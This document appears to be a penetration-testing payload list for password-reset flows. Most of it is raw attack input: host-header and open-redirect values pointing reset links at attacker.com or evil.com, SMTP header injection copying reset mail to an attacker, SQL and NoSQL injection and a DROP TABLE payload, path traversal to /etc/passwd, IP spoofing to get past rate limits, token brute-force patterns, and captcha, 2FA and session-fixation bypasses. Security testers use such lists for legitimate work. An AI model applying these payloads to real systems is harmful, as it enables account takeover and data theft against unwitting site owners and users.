# Password Reset Vulnerability Payloads

# ============================================
# 1. HOST HEADER INJECTION PAYLOADS
# ============================================

# Basic host header manipulation
Host: attacker.com
Host: evil.com
Host: attacker.com:80
Host: localhost

# X-Forwarded headers
X-Forwarded-Host: attacker.com
X-Forwarded-Host: evil.com
X-Forwarded-Server: attacker.com
X-Host: attacker.com
X-Forwarded-For: attacker.com

# Absolute URL in Host header
Host: https://attacker.com
Host: http://evil.com/reset

# Host header with port manipulation
Host: example.com:@attacker.com
Host: example.com@attacker.com
Host: example.com%00.attacker.com
Host: example.com%0d%0aHost:%20attacker.com

# Multiple host headers
Host: example.com
Host: attacker.com

# Host header with path
Host: example.com/reset
Host: attacker.com/../example.com

# ============================================
# 2. PARAMETER POLLUTION PAYLOADS
# ============================================

# Multiple email parameters
email=victim@example.com&email=attacker@example.com
email[]=victim@example.com&email[]=attacker@example.com
email=victim@example.com,attacker@example.com
email=victim@example.com%20attacker@example.com
email=victim@example.com|attacker@example.com
email=victim@example.com;attacker@example.com

# Email with CC/BCC injection
email=victim@example.com%0Acc:attacker@example.com
email=victim@example.com%0Abcc:attacker@example.com
email=victim@example.com%0D%0ACC:attacker@example.com
email=victim@example.com%0d%0aBcc:attacker@example.com

# JSON array pollution
{"email": ["victim@example.com", "attacker@example.com"]}
{"email": "victim@example.com", "email": "attacker@example.com"}

# Multiple parameters with different names
email=victim@example.com&mail=attacker@example.com
email=victim@example.com&username=attacker
to=victim@example.com&cc=attacker@example.com

# ============================================
# 3. TOKEN MANIPULATION PAYLOADS
# ============================================

# Empty token
token=
token=%20
token=null
token=undefined
token=0

# Boolean bypass
token=true
token=false
token=1
token=0

# Array manipulation
token[]=valid_token
token[]=
token[0]=valid_token

# SQL injection in token
token=' OR '1'='1
token=1' OR '1'='1'--
token=' OR 1=1--
token=admin'--
token='; DROP TABLE tokens;--

# NoSQL injection in token
{"token": {"$gt": ""}}
{"token": {"$ne": null}}
{"token": {"$regex": ".*"}}

# Path traversal in token
token=../../../../../../etc/passwd
token=....//....//....//etc/passwd
token=..%2F..%2F..%2Fetc%2Fpasswd

# Token with special characters
token=<script>alert(1)</script>
token=javascript:alert(1)
token=%00
token=%0d%0a

# Wildcard token
token=*
token=%
token=.*
token=.+

# ============================================
# 4. USER IDENTIFIER MANIPULATION (IDOR)
# ============================================

# User ID manipulation
user_id=1
user_id=2
user_id=admin
user_id=0
user_id=-1
user_id=999999

# Username manipulation
username=admin
username=administrator
username=root
username=victim

# Email manipulation
email=admin@example.com
email=admin@localhost
email=root@localhost

# UUID manipulation
user_uuid=00000000-0000-0000-0000-000000000001
user_uuid=11111111-1111-1111-1111-111111111111

# Account ID variations
account_id=1&user_id=2
uid=admin
user=admin

# ============================================
# 5. RATE LIMITING BYPASS PAYLOADS
# ============================================

# IP header spoofing
X-Forwarded-For: 1.2.3.4
X-Forwarded-For: 127.0.0.1
X-Real-IP: 1.2.3.4
X-Originating-IP: 1.2.3.4
X-Remote-IP: 1.2.3.4
X-Remote-Addr: 1.2.3.4
X-Client-IP: 1.2.3.4

# Randomized IPs for each request
X-Forwarded-For: <random_ip>
X-Real-IP: 192.168.1.<1-255>

# Multiple IP headers
X-Forwarded-For: 1.1.1.1, 2.2.2.2, 3.3.3.3
X-Forwarded-For: 127.0.0.1
X-Real-IP: 192.168.1.1

# Session manipulation
session_id=<different_session_each_request>
PHPSESSID=<random_session>

# User agent rotation
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
User-Agent: Mozilla/5.0 (X11; Linux x86_64)

# ============================================
# 6. WEAK TOKEN PATTERNS TO BRUTE FORCE
# ============================================

# 4-digit numeric codes
0000
0001
0002
...
9999

# 6-digit numeric codes (common OTP length)
000000
000001
...
999999

# Sequential tokens
token_1
token_2
token_3

# Timestamp-based tokens (Unix timestamp)
1609459200
1609459201
1609459202

# MD5 of simple inputs
5f4dcc3b5aa765d61d8327deb882cf99 (MD5 of "password")
e10adc3949ba59abbe56e057f20f883e (MD5 of "123456")

# Short alphanumeric (low entropy)
aaa
aab
aac
...
zzz

# Base64 encoded simple strings
YWRtaW4= (admin)
dGVzdA== (test)
MTIzNDU2 (123456)

# ============================================
# 7. RESPONSE MANIPULATION PAYLOADS
# ============================================

# These are used in client-side manipulation
{"valid": false} -> {"valid": true}
{"authenticated": false} -> {"authenticated": true}
{"error": "Invalid token"} -> {"success": "Token valid"}
{"status": 401} -> {"status": 200}
{"token_valid": false} -> {"token_valid": true}

# ============================================
# 8. ACCOUNT ENUMERATION PAYLOADS
# ============================================

# Valid vs invalid email testing
email=admin@example.com
email=administrator@example.com
email=test@example.com
email=nonexistent@example.com
email=invalid@invalid.invalid

# Username enumeration
username=admin
username=administrator
username=root
username=test
username=user
username=demo
username=guest

# Email format variations
email=admin
email=admin@
email=@example.com
email=admin@@example.com
email=admin@.com

# ============================================
# 9. EMAIL INJECTION PAYLOADS
# ============================================

# SMTP header injection
email=victim@example.com%0D%0ATo:attacker@evil.com
email=victim@example.com%0ABcc:attacker@evil.com
email=victim@example.com%0ASubject:Malicious

# Email with newline injection
email=victim@example.com%0A%0AAttacker content
email=victim@example.com\r\nBcc:attacker@evil.com
email=victim@example.com\nTo:attacker@evil.com

# Multiple recipients
email=victim@example.com,attacker@evil.com
email=victim@example.com;attacker@evil.com
email="victim@example.com, attacker@evil.com"

# ============================================
# 10. CRYPTO ANALYSIS PAYLOADS
# ============================================

# Test for weak encryption/encoding
token=base64_decode_this
token=rot13_this
token=hex_decode_this

# Known weak hashes to test
token=d41d8cd98f00b204e9800998ecf8427e (MD5 of empty string)
token=5d41402abc4b2a76b9719d911017c592 (MD5 of "hello")

# ============================================
# 11. TIME-BASED TESTING PAYLOADS
# ============================================

# Future timestamps
valid_until=9999999999
expires_at=2099-12-31
expiry=9999999999999

# Past timestamps (should be invalid)
timestamp=0
timestamp=1
created_at=1970-01-01

# ============================================
# 12. WORKFLOW BYPASS PAYLOADS
# ============================================

# Skip verification step
verified=true
email_verified=true
skip_verification=true
bypass=true

# Status manipulation
status=completed
status=verified
status=approved
password_reset_completed=true

# Step manipulation
step=1
step=3
skip_step=2
current_step=final

# ============================================
# 13. API-SPECIFIC PAYLOADS
# ============================================

# GraphQL mutations
{"query":"mutation{resetPassword(email:\"victim@example.com\"){success}}"}
{"query":"mutation{resetPassword(email:\"admin@example.com\",token:\"\"){success}}"}

# REST API variations
PUT /api/v1/users/1/password
PATCH /api/v1/password/reset
POST /api/reset
POST /api/v2/auth/forgot-password

# ============================================
# 14. SPECIAL CHARACTERS & ENCODING
# ============================================

# URL encoding
email=victim%40example.com
email=victim%2540example.com (double encoding)

# Unicode characters
email=victim@еxample.com (Cyrillic 'e')
email=admin@＠example.com

# Null bytes
email=victim@example.com%00
email=victim@example.com%00.attacker.com
token=valid_token%00

# HTML encoding
email=victim&#64;example.com
email=victim&commat;example.com

# ============================================
# 15. BUSINESS LOGIC BYPASS
# ============================================

# Negative values
user_id=-1
token_attempts=-1
rate_limit=-1

# Very large numbers
user_id=999999999
user_id=2147483647
user_id=9999999999999999999

# Array manipulation
user_id[]=1
user_id[]=2
emails[]=victim@example.com

# Type juggling
user_id="1"
user_id=1
user_id=true
user_id=null

# ============================================
# 16. CASE SENSITIVITY BYPASS
# ============================================

email=ADMIN@EXAMPLE.COM
email=Admin@Example.Com
username=ADMIN
username=AdMiN
token=ABCDEF
token=AbCdEf

# ============================================
# 17. LINK MANIPULATION
# ============================================

# Redirect after reset
redirect_url=https://attacker.com
return_url=https://evil.com
next=https://attacker.com/capture
callback=https://evil.com

# Open redirect in reset flow
redirect=//attacker.com
redirect=///attacker.com
redirect=/\/\attacker.com
redirect=//google.com@attacker.com

# ============================================
# 18. CORS & ORIGIN MANIPULATION
# ============================================

Origin: https://attacker.com
Origin: null
Referer: https://attacker.com/reset
Access-Control-Allow-Origin: *

# ============================================
# 19. RACE CONDITION PAYLOADS
# ============================================

# Send simultaneous requests
# Multiple threads requesting:
POST /reset-password with same token
POST /forgot-password for same email
POST /verify-token with same token

# ============================================
# 20. VERBOSE ERROR MESSAGES
# ============================================

# Test different invalid inputs to enumerate:
email=nonexistent@example.com
# Expected: "Email not found" (reveals valid emails)

token=invalid
# Expected: "Invalid token" vs "Expired token" (information disclosure)

user_id=9999
# Expected: "User does not exist" (user enumeration)

# ============================================
# 21. CAPTCHA BYPASS
# ============================================

captcha=
g-recaptcha-response=
h-captcha-response=
recaptcha_token=null
captcha_token=
skip_captcha=true

# ============================================
# 22. TWO-FACTOR BYPASS VIA PASSWORD RESET
# ============================================

# Test if password reset bypasses 2FA
skip_2fa=true
bypass_2fa=true
2fa_enabled=false
require_otp=false
mfa_required=false

# ============================================
# 23. PASSWORD CONFIRMATION BYPASS
# ============================================

# Missing confirmation field
new_password=NewPass123
# (without confirm_password field)

# Mismatched passwords
new_password=NewPass123
confirm_password=DifferentPass456

# Empty confirmation
new_password=NewPass123
confirm_password=

# ============================================
# 24. WEAK PASSWORD ALLOWED
# ============================================

# Test if weak passwords are accepted in reset
new_password=123
new_password=password
new_password=admin
new_password=123456
new_password=12345678
new_password=qwerty
new_password=abc123

# ============================================
# 25. SESSION FIXATION
# ============================================

# Set session before reset
Cookie: session_id=attacker_controlled_value
PHPSESSID=attacker_session

# After victim resets password with this session,
# attacker can use the session to access account

# ============================================
# 26. HTTP METHOD TAMPERING
# ============================================

# Try different HTTP methods on reset endpoint
GET /api/reset-password?token=abc&password=new
PUT /api/reset-password
DELETE /reset-password
PATCH /reset-password
HEAD /reset-password
OPTIONS /reset-password

# ============================================
# 27. CONTENT-TYPE MANIPULATION
# ============================================

Content-Type: application/json
Content-Type: application/x-www-form-urlencoded
Content-Type: multipart/form-data
Content-Type: text/plain
Content-Type: application/xml

# ============================================
# 28. PASSWORD IN RESPONSE
# ============================================

# Check if new password is returned in response
# After setting: new_password=SecretPass123
# Response should NOT contain:
{"password": "SecretPass123"}
{"new_password": "SecretPass123"}

# ============================================
# 29. NO CONFIRMATION EMAIL
# ============================================

# Test if user is notified after password reset
# User should receive confirmation that password was changed
# If not, attacker can silently reset passwords

# ============================================
# 30. TEMPORAL ATTACKS
# ============================================

# Timing attack to enumerate users
# Measure response time difference:
email=valid@example.com (slower response)
email=invalid@example.com (faster response)

# ============================================
# TEST SCENARIOS
# ============================================

# Scenario 1: Reset without current password
POST /change-password
new_password=NewPassword123
# Should require old_password field

# Scenario 2: Token reuse
1. Get token: /forgot-password?email=test@example.com
2. Use token: /reset?token=abc123&password=new1
3. Try token again: /reset?token=abc123&password=new2
# Second attempt should fail

# Scenario 3: Expired token
1. Get token
2. Wait > expiration time
3. Try to use expired token
# Should be rejected

# Scenario 4: Token for different user
1. Request reset for user A
2. Get token for user A
3. Try to use it for user B
# Should be rejected

# Scenario 5: Multiple active tokens
1. Request reset (get token1)
2. Request reset again (get token2)
3. Use token1
# token1 should still work, or only latest token should work